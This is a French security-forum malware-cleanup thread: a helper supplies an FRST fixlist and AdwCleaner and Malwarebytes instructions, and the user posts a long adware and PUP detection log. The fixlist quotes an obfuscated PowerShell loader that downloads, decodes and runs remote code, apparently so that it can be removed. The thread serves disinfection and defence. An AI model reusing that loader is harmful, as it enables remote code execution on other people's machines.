 f u n c t i o n   w c ( $ u r l ) { $ r q = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ r q . U s e D e f a u l t C r e d e n t i a l s = $ t r u e ; $ r q . H e a d e r s . A d d ( " u s e r - a g e n t " , " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   6 . 1 ; ) " ) ; r e t u r n   [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( $ r q . D o w n l o a d D a t a ( $ u r l ) ) ; } 
 f u n c t i o n   d s t r ( $ r a w d a t a ) { $ b t = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r a w d a t a ) ; $ e x t = $ b t [ 0 ] ; $ k e y = $ b t [ 1 ]   - b x o r   1 7 0 ; f o r ( $ i = 2 ; $ i   - l t   $ b t . L e n g t h ; $ i + + ) { $ b t [ $ i ] = ( $ b t [ $ i ]   - b x o r   ( ( $ k e y   +   $ i )   - b a n d   2 5 5 ) ) ; } 
 r e t u r n ( N e w - O b j e c t   I O . S t r e a m R e a d e r ( N e w - O b j e c t   I O . C o m p r e s s i o n . D e f l a t e S t r e a m ( ( N e w - O b j e c t   I O . M e m o r y S t r e a m ( $ b t , 2 , ( $ b t . L e n g t h - $ e x t ) ) ) , [ I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ; } 
 $ s c = d s t r ( w c ( $ s u r l ) ) ; I n v o k e - E x p r e s s i o n   - c o m m a n d   " $ s c " ; } c a t c h { } ; e x i t   0 ; 
      Task: {2E995896-1403-4B3C-A0CE-08E2CC86CEC8} - System32\Tasks\{C8C5A7B0-140E-4DB7-AE8F-8DAA32E87B74} => pcalua.exe -a C:\ProgramData\Boxore\7.1\Boxore.exe -c --uninstall --finalize --prompt --self-clear --no-loop
      Task: {3CE8C7EC-A295-4302-9FFB-ACE57B8A963E} - System32\Tasks\{58FDE6D7-A507-4423-B1CD-66DFA0C6118A} => pcalua.exe -a "C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UN0CJUNZ\Range_RAT5_SD7_0_20_0_32Bit_Drivers_NonWHQL.exe" -d C:\Users\S\Desktop
      Task: {734C3AC7-651B-4352-996F-F7C109F3701A} - System32\Tasks\{1F4A89EC-573E-4BEA-8104-7FC6597AC0DB} => pcalua.exe -a C:\ProgramData\HealthAlert\uninstall.exe -c /kb=y /ic=1
      Task: {7A303B39-7CDA-4A1E-9891-0A011C6E1469} - System32\Tasks\{4FD1D25B-8F85-4B36-9D41-19E3BCE1E189} => pcalua.exe -a C:\Users\S\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=tugs
      Task: {83EF2014-E426-471A-8F68-9F3703DC3386} - System32\Tasks\{21ED9E85-E8AF-45E2-97A9-25CC8F78086A} => pcalua.exe -a "C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OZXP1FQ7\Range_RAT5_SD7_0_20_0_64Bit_Drivers_NonWHQL.exe" -d C:\Users\S\Desktop
      Task: {9193837B-FC9A-4313-BBD2-EB2A8A277FC4} - System32\Tasks\{8DD57CC7-894A-4ED9-AB4F-2AC8F3A8E607} => pcalua.exe -a C:\Users\S\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=smt
      Task: {96BA2B19-8421-47E0-AEBE-CD20ADC97CCE} - System32\Tasks\SMWUpd => C:\Program Files\Common Files\Goobzo\GBUpdate\updatehelper.exe
      Task: {DF37F4BC-4105-4B00-B85F-9780A2B2AD6B} - System32\Tasks\{E75605B3-C286-4A31-B8ED-8867D2947E21} => pcalua.exe -a "C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LGVVN9I5\logitech_logitech_setpoint_vista_4.70_4005.exe" -d C:\Users\S\Desktop
      Task: {FD9906E6-A57B-4828-8351-3EAC75386662} - System32\Tasks\{A400D9BF-35AA-4908-A12C-26F78BFA9C0E} => pcalua.exe -a C:\Users\S\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=tugs
      ShortcutWithArgument: C:\Users\S\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G1Vzbwybl01,018946f8-eaae-4b0e-982f-6bfe16626fb9,
      AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{2755e52c-c805-11e5-ae75-bcee7b86f8d3}
      AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{2755e52d-c805-11e5-ae75-bcee7b86f8d3}
      AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9
      HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zcengine => ""="service"
      IE trusted site: HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\...\localhost -> localhost
      IE trusted site: HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\...\webcompanion.com -> hxxp://webcompanion.com
      Hosts:
      EmptyTemp:
      end


    • Enregistre le fichier sur ton Bureau (au même endroit que FRST) sous le nom fixlist.txt
    • Ferme toutes les applications, y compris ton navigateur
    • Double-clique sur FRST64.exe
      /!\ Sous Vista, Windows 7, 8 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • Sur le menu principal, clique une seule fois sur Corriger et patiente le temps de la correction

    • Accepte le redémarrage du système si demandé
    • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse.


  • /!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows /!\

    --------------------------------------------------------------------------------------------------------------

    AdwCleaner - Scanner :

    • Télécharge AdwCleaner de Xplode et enregistre le fichier sur ton Bureau
      Patiente le temps que ton navigateur te propose le téléchargement à enregistrer, sans cliquer nulle part, surtout pas sur les sponsors de la page
    • Ferme toutes les applications, y compris ton navigateur
    • Double-clique sur l'icône AdwCleaner.exe pour lancer l'outil
      /!\ Sous Vista, Windows 7, 8 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • Sur le menu principal, clique sur Scanner
    • Les éléments détectés s'affichent dans les différents onglets. Clique sur Rapport
    • Un rapport AdwCleaner(Sx).txt s'ouvre. Poste ce rapport dans ta prochaine réponse
      Le rapport se trouve sous C:\AdwCleaner\AdwCleaner(Sx).txt


  • Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même

    Si ton antivirus émet une alerte ou bloque l'outil, il faut le désactiver temporairement (le fichier AdwCleaner.exe est sûr)

    Tutoriel d'utilisation AdwCleaner en images

    --------------------------------------------------------------------------------------------------------------

    Sont attendus les rapports
    Fixlog
    AdwCleaner-Scanner


    @+
    m
    0
    l
    a c 940 8 Sécurité
    a c 103 È Firefox
    a b , Internet Explorer
    21 Février 2016 10:52:39

    Re,

    OK, nous continuons le nettoyage.

    --------------------------------------------------------------------------------------------------------------

    AdwCleaner - Nettoyer :

    • Ferme toutes les applications, y compris ton navigateur
    • Double-clique sur l'icône AdwCleaner.exe pour lancer l'outil
      /!\ Sous Vista, Windows 7, 8 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • Sur le menu principal, clique sur Scanner
    • Les éléments détectés s'affichent dans les différents onglets. Clique sur Nettoyer et valide par OK la fermeture des programmes
    • Patiente le temps de l'analyse et valide le message d'informations
    • Un redémarrage est demandé, valider par OK
    • Au redémarrage, un rapport AdwCleaner(Cx).txt s'ouvre. Poste ce rapport dans ta prochaine réponse
      Le rapport se trouve sous C:\AdwCleaner\AdwCleaner(Cx).txt


  • Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même

    Si ton antivirus émet une alerte ou bloque l'outil, il faut le désactiver temporairement (le fichier AdwCleaner.exe est sûr)

    Tutoriel d'utilisation AdwCleaner en images

    En cas de perte de connexion internet après le passage de l'outil, appliquer une de ces procédures Perte de connexion internet après l'utilisation d'un outil

    --------------------------------------------------------------------------------------------------------------

    Malwarebytes Anti-Malware :

    • Télécharge Malwarebytes Anti-Malware (version gratuite) et enregistre le sur le Bureau
    • Double-clique sur le fichier mbam-setup.exe pour lancer l'installation
      /!\ Sous Vista, Windows 7, 8 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • A la fin de l'installation, décoche l'option "Activer l'essai gratuit de Malwarebytes Anti-Malware Premium". La case Exécuter Malwarebytes Anti-Malware reste cochée.
    • Clique sur Terminer. Malwarebyte's s'ouvre
    • Pour mettre en français si ce n'est pas le cas, dans Settings, puis General Settings, dans Language, sélectionne French
    • Dans Version de la base de données, clique sur le lien Mettre à jour pour installer les mises à jour et laisse l'outil les installer
    • Dans Paramètres, puis Détection et protection, sélectionne Traiter les détections comme des malveillants pour les détections PUP et PUM
    • Dans Examen, clique sur Analyse des Menaces puis clique sur Lancer l'analyse
    • Si l'outil te propose d'autres mises à jour, valide en cliquant sur Mettre à jour maintenant
    • Patiente le temps de l'analyse
    • Pour supprimer les éléments détectés, veille à ce que tous les éléments détectés soient cochés puis clique sur Supprimer la sélection
    • Si un redémarrage est demandé, clique sur Oui
    • Au redémarrage, relance Malwarebytes
    • Dans Historique, clique sur Journaux de l'application
    • Double-clique sur le Journal d'analyse le plus récent, le journal d'examen s'affiche
    • Clique sur Exporter puis sur Fichier texte (*.txt)
    • Enregistre le rapport sur ton Bureau. Poste ce rapport dans ta prochaine réponse
      Le journal d'examen est aussi enregistré sous C:\ProgramData\Malwarebytes\Malwarebytes' Anti-Malware\Logs


  • Tutoriel d'utilisation Malwarebytes en images

    --------------------------------------------------------------------------------------------------------------

    Sont attendus les rapports
    AdwCleaner-Nettoyer
    Malwarebytes


    @+
    m
    0
    l
    21 Février 2016 11:23:55

    Re-salut,

    Donc déjà le navigateur internet fonctionne de nouveau, c'est déjà super cool
    Voici les rapports demandés:

    -AdwCleaner: http://up.security-x.fr/file.php?h=Rdeceef0bee7bd135b56...
    -Malwarebytes: N'arrivant pas à mettre le rapport sur le site up.security-x je le copie en dessous:

    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Date de l'analyse: 21/02/2016
    Heure de l'analyse: 11:06
    Fichier journal: journal d'analyse.txt
    Administrateur: Oui

    Version: 2.2.0.1024
    Base de données de programmes malveillants: v2016.02.21.02
    Base de données de rootkits: v2016.02.17.01
    Licence: Gratuit
    Protection contre les programmes malveillants: Désactivé
    Protection contre les sites Web malveillants: Désactivé
    Autoprotection: Désactivé

    Système d'exploitation: Windows 7 Service Pack 1
    Processeur: x64
    Système de fichiers: NTFS
    Utilisateur: S

    Type d'analyse: Analyse des menaces
    Résultat: Terminé
    Objets analysés: 374216
    Temps écoulé: 3 min, 45 s

    Mémoire: Activé
    Démarrage: Activé
    Système de fichiers: Activé
    Archives: Activé
    Rootkits: Désactivé
    Heuristique: Activé
    PUP: Activé
    PUM: Activé

    Processus: 0
    (Aucun élément malveillant détecté)

    Modules: 0
    (Aucun élément malveillant détecté)

    Clés du Registre: 54
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataContainer, En quarantaine, [6aecbfa49cfd1d1966262832c83c728e],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataContainer.1, En quarantaine, [5df979eaf0a98aac6824b6a4db299e62],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataController, En quarantaine, [f6603b281881ef47a3e9c99159abe917],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataController.1, En quarantaine, [eb6b5e051188cc6a4e3e80da1ee6619f],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataTable, En quarantaine, [f462c69d4d4c2b0b0686302a38cc7d83],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataTable.1, En quarantaine, [76e0b8abd3c62511b9d355058f75a25e],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataTableFields, En quarantaine, [5402a5be1e7b61d5216b2b2f778d966a],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataTableFields.1, En quarantaine, [f3632c37861353e3810bc09ac53f21df],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataTableHolder, En quarantaine, [88ce9cc76534af875339e77332d2728e],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.DataTableHolder.1, En quarantaine, [c591481b7326102696f6d9816a9a3ac6],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.LSPLogic, En quarantaine, [fb5bdd86c5d4092d6a22d08a778d9967],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.LSPLogic.1, En quarantaine, [d383055e6e2bcd69206cb5a5f60ef010],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.ReadOnlyManager, En quarantaine, [f85e6102d4c5f541dfad0258917346ba],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.ReadOnlyManager.1, En quarantaine, [82d4adb65a3fe94d5a324a1063a10df3],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.WFPController, En quarantaine, [b1a54320aced93a391fb2832f2122fd1],
    PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\zcengineLib.WFPController.1, En quarantaine, [4a0cea79851474c285073426749010f0],
    PUP.Optional.VBates, HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\4832D1BACA6156C53A74A472BE8678EAAABC8CBE, En quarantaine, [96c07be8fc9d3bfb80c5560fbb49ea16],
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\mtcaMyciloP, En quarantaine, [5303fa6953464de9018e144e679d5aa6],
    PUP.Optional.TermBlazer, HKLM\SOFTWARE\WOW6432NODE\TermBlazer_1.10.0.16, En quarantaine, [3026441ff6a3e94dd23330df0afa6e92],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataContainer, En quarantaine, [de7813505a3fec4ab0dcc694e420718f],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataContainer.1, En quarantaine, [5afcafb45f3a2313800cc793de2608f8],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataController, En quarantaine, [69edcf94d8c152e48b01d6844bb93ac6],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataController.1, En quarantaine, [9bbb69fa5148e353f3996eec24e0d030],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataTable, En quarantaine, [b2a4baa91881d561cfbd0d4d986ccf31],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataTable.1, En quarantaine, [3e185e05aaefa5915933bb9f9c68f907],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataTableFields, En quarantaine, [8ec8d48f4752b58116763723c73dcc34],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataTableFields.1, En quarantaine, [6bebd390782168ce464614464db77f81],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataTableHolder, En quarantaine, [e571342febae35018dffc199e024db25],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.DataTableHolder.1, En quarantaine, [acaacb98bedbdc5a49439dbdba4a5ca4],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.LSPLogic, En quarantaine, [7bdb184bfd9ca5918ffd63f7d034bc44],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.LSPLogic.1, En quarantaine, [6fe703607d1c72c4b6d60a50fa0a60a0],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.ReadOnlyManager, En quarantaine, [f75f0c57c4d54aec345871e941c3dd23],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.ReadOnlyManager.1, En quarantaine, [1d39283be3b63cfa33596ded0400f907],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.WFPController, En quarantaine, [dd79441f2970a09634589ebc47bd5fa1],
    PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\zcengineLib.WFPController.1, En quarantaine, [3d197de612870f27bdcf1347a65ed828],
    PUP.Optional.VBates, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\4832D1BACA6156C53A74A472BE8678EAAABC8CBE, En quarantaine, [74e2f86bf3a679bd7dc82a3bda2ae51b],
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\caMyciloP.exe, En quarantaine, [6bebd88b26732a0c4e3f39294eb638c8],
    PUP.Optional.SystemSpeedup, HKLM\SOFTWARE\WOW6432NODE\SYSTWEAK\ssd, En quarantaine, [70e6c59ec4d5e353449bbf53659efe02],
    PUP.Optional.PCSpeedUp, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\PCSUUCDRV, En quarantaine, [c78fafb4c0d92610948f5ca359aa5fa1],
    PUP.Optional.Linkury, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting, En quarantaine, [05510a594b4e83b3e06bde1f56ac55ab],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTERNETREGISTRY\REGISTRY\USER\S-1-5-18\SOFTWARE\shopperz310120161627, En quarantaine, [5df9fb683663dc5a1173e47543c1a45c],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTERNETREGISTRY\REGISTRY\USER\S-1-5-18\SOFTWARE\shopperz310120161636, En quarantaine, [7dd9a5bebcdd0f276321ba9f54b08779],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-18\SOFTWARE\{E63C2935-7BD7-4E9C-8144-D0AF35BE8210}, En quarantaine, [78de0f54c3d6fc3a76dc8d477a89da26],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-18\SOFTWARE\{ED7FB144-25F3-4CB4-86A9-A15C8FE336CB}, En quarantaine, [1b3bb3b0ff9a44f2c092973dce35b44c],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-19\SOFTWARE\{E63C2935-7BD7-4E9C-8144-D0AF35BE8210}, En quarantaine, [035388dba3f640f6ada51db78b7851af],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-19\SOFTWARE\{ED7FB144-25F3-4CB4-86A9-A15C8FE336CB}, En quarantaine, [b2a4b5aecccd39fd2c26e0f406fd03fd],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-20\SOFTWARE\{E63C2935-7BD7-4E9C-8144-D0AF35BE8210}, En quarantaine, [1a3cc79c60394bebada5ddf78d7653ad],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-20\SOFTWARE\{ED7FB144-25F3-4CB4-86A9-A15C8FE336CB}, En quarantaine, [470f144fa0f95bdb5200ab2949ba2fd1],
    PUP.Optional.Komodia, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\INSTALLPATH\STATUS, En quarantaine, [71e55c0792072214a14d7cdeab5906fa],
    PUP.Optional.Tuto4PC, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\MICROSOFT\IDSC, En quarantaine, [f660f073f7a224120494f06f1ee67a86],
    PUP.Optional.CrossRider, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{EC9A8CA0-12C3-4036-B5EF-27658E77D8DD}, En quarantaine, [ec6a41229aff04325e51f1f3b64d748c],
    PUP.Optional.SystemSpeedup, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\SYSTWEAK\ssd, En quarantaine, [bf9783e05d3cc571439bfe14c043c13f],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\{E63C2935-7BD7-4E9C-8144-D0AF35BE8210}, En quarantaine, [78de4e15c6d3a4921e34597ba261bc44],
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\{ED7FB144-25F3-4CB4-86A9-A15C8FE336CB}, En quarantaine, [4610da89b4e5f5414b070fc570939b65],

    Valeurs du Registre: 15
    PUP.Optional.Linkury.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|Default, http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYEqQao2TxTGptbOxpBNbMQc-Bz0zMmgmr5inyhA7tzxvYkPkhhKDzNlS6I2DRv6Ehlz85-4kKiSDkuBdELXYSvu2Ob1asQZyAmgMsszc444D9cer9NzESw2KUlysHe_ymJRffzpK3fNYD38kbzPtuVuaPO8ncGIUSCfE1UDgn9RqRpNLBahUBwCl3KmP5U,&q={searchTerms}, En quarantaine, [183e9fc46336e65096a300d155ae40c0]
    PUP.Optional.Linkury, HKU\S-1-5-18\ENVIRONMENT|SNP, http://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D?publisher=apsnapdoam&co=FR&userid=b1dde8a5-0263-922b-7230-cd29c67f2116&searchtype=sc&installDate=31/01/2016&barcodeid=50046888&channelid=888&av=windows, En quarantaine, [2f275e05b6e3a492774c728254af6997]
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-18\SOFTWARE\{E63C2935-7BD7-4E9C-8144-D0AF35BE8210}|Name, C:\Program Files\shopperz310120161915\Naltiiu.exe, En quarantaine, [78de0f54c3d6fc3a76dc8d477a89da26]
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-18\SOFTWARE\{ED7FB144-25F3-4CB4-86A9-A15C8FE336CB}|Name, C:\Program Files\shopperz310120161627\Tigil.exe, En quarantaine, [1b3bb3b0ff9a44f2c092973dce35b44c]
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-19\SOFTWARE\{E63C2935-7BD7-4E9C-8144-D0AF35BE8210}|Name, C:\Program Files\shopperz310120161915\Naltiiu.exe, En quarantaine, [035388dba3f640f6ada51db78b7851af]
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-19\SOFTWARE\{ED7FB144-25F3-4CB4-86A9-A15C8FE336CB}|Name, C:\Program Files\shopperz310120161627\Tigil.exe, En quarantaine, [b2a4b5aecccd39fd2c26e0f406fd03fd]
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-20\SOFTWARE\{E63C2935-7BD7-4E9C-8144-D0AF35BE8210}|Name, C:\Program Files\shopperz310120161915\Naltiiu.exe, En quarantaine, [1a3cc79c60394bebada5ddf78d7653ad]
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-20\SOFTWARE\{ED7FB144-25F3-4CB4-86A9-A15C8FE336CB}|Name, C:\Program Files\shopperz310120161627\Tigil.exe, En quarantaine, [470f144fa0f95bdb5200ab2949ba2fd1]
    PUP.Optional.Komodia, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\INSTALLPATH\STATUS|FlowsurfCB, Y, En quarantaine, [71e55c0792072214a14d7cdeab5906fa]
    PUP.Optional.Tuto4PC, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\MICROSOFT\IDSC|partner, tuto, En quarantaine, [f660f073f7a224120494f06f1ee67a86]
    PUP.Optional.CrossRider, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{EC9A8CA0-12C3-4036-B5EF-27658E77D8DD}|AppName, 7ea75025-40fe-4a36-9c6e-a000bbe23386-2.exe-buttonutil.exe, En quarantaine, [ec6a41229aff04325e51f1f3b64d748c]
    PUP.Optional.DeskBar, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|DeskBar.exe, 8888, En quarantaine, [e57165fe0b8eb77f72e6acac54b038c8]
    PUP.Optional.Linkury.ShrtCln, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|Default, http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYEqQao2TxTGptbOxpBNbMQc-Bz0zMmgmr5inyhA7tzxvYkPkhhKDzNlS6I2DRv6Ehlz85-4kKiSDkuBdELXYSvu2Ob1asQZyAmgMsszc444D9cer9NzESw2KUlysHe_ymJRffzpK3fNYD38kbzPtuVuaPO8ncGIUSCfE1UDgn9RqRpNLBahUBwCl3KmP5U,&q={searchTerms}, En quarantaine, [d77fce955247db5b2b0b24adef14e719]
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\{E63C2935-7BD7-4E9C-8144-D0AF35BE8210}|Name, C:\Program Files\shopperz310120161915\Naltiiu.exe, En quarantaine, [78de4e15c6d3a4921e34597ba261bc44]
    PUP.Optional.Shopperz.BrwsrFlsh, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\{ED7FB144-25F3-4CB4-86A9-A15C8FE336CB}|Name, C:\Program Files\shopperz310120161627\Tigil.exe, En quarantaine, [4610da89b4e5f5414b070fc570939b65]

    Données du Registre: 1
    PUP.Optional.Linkury.ShrtCln, HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|Default_Search_URL, http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYEqQao2TxTGptbOxpBNbMQc-Bz0zMmgmr5inyhA7tzxvYkPkhhKDzNlS6I2DRv6Ehlz85-4kKiSDkuBdELXYSvu2Ob1asQZyAmgMsszc444D9cer9NzESw2KUlysHe_ymJRffzpK3fNYD38kbzPtuVuaPO8ncGIUSCfE1UDgn9RqRpNLBahUBwCl3KmP5U,&q={searchTerms}, Bon : (www.google.com), Mauvais : (http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYEqQao2TxTGptbOxpBNbMQc-Bz0zMmgmr5inyhA7tzxvYkPkhhKDzNlS6I2DRv6Ehlz85-4kKiSDkuBdELXYSvu2Ob1asQZyAmgMsszc444D9cer9NzESw2KUlysHe_ymJRffzpK3fNYD38kbzPtuVuaPO8ncGIUSCfE1UDgn9RqRpNLBahUBwCl3KmP5U,&q={searchTerms}),Remplacé,[f0667ce73c5dd75f70587975c2429c64]

    Dossiers: 6
    PUP.Optional.Less2Pay, C:\Program Files\lesS2paayi, En quarantaine, [7bdbc79c1d7c270ffbad4ab8778c3cc4],
    PUP.Optional.WinYahoo, C:\Program Files (x86)\Wincy, En quarantaine, [3125c2a12772cc6a14b723f2e321837d],
    PUP.Optional.CouponArific, C:\Program Files (x86)\35556262-902E-49AE-8622-66E14F1F041C, En quarantaine, [d77fb6ad3e5b92a465310ac4649ed62a],
    PUP.Optional.FastPlayer, C:\Users\S\AppData\Local\com\FastPlayer.exe_Url_ypw5ldaz5xtubzl3ykl5vaw3nmhswq1q, En quarantaine, [92c464ff4455b5811df7b721a0625ea2],
    PUP.Optional.FastPlayer, C:\Users\S\AppData\Local\com\FastPlayer.exe_Url_ypw5ldaz5xtubzl3ykl5vaw3nmhswq1q\1.0.0.2, En quarantaine, [92c464ff4455b5811df7b721a0625ea2],
    PUP.Optional.DataMngr.AppFlsh, C:\Users\S\AppData\LocalLow\DataMngr, En quarantaine, [9db9481bf4a5d85e0efd95604ab8e11f],

    Fichiers: 12
    PUP.Optional.Less2Pay, C:\Program Files\lesS2paayi\FyZfTihMNMy8EI.tlb, En quarantaine, [7bdbc79c1d7c270ffbad4ab8778c3cc4],
    PUP.Optional.Less2Pay, C:\Program Files\lesS2paayi\FyZfTihMNMy8EI.dat, En quarantaine, [7bdbc79c1d7c270ffbad4ab8778c3cc4],
    PUP.Optional.WinYahoo, C:\Program Files (x86)\Wincy\config.dat, En quarantaine, [3125c2a12772cc6a14b723f2e321837d],
    PUP.Optional.WinYahoo, C:\Program Files (x86)\Wincy\Sqlite3.dll, En quarantaine, [3125c2a12772cc6a14b723f2e321837d],
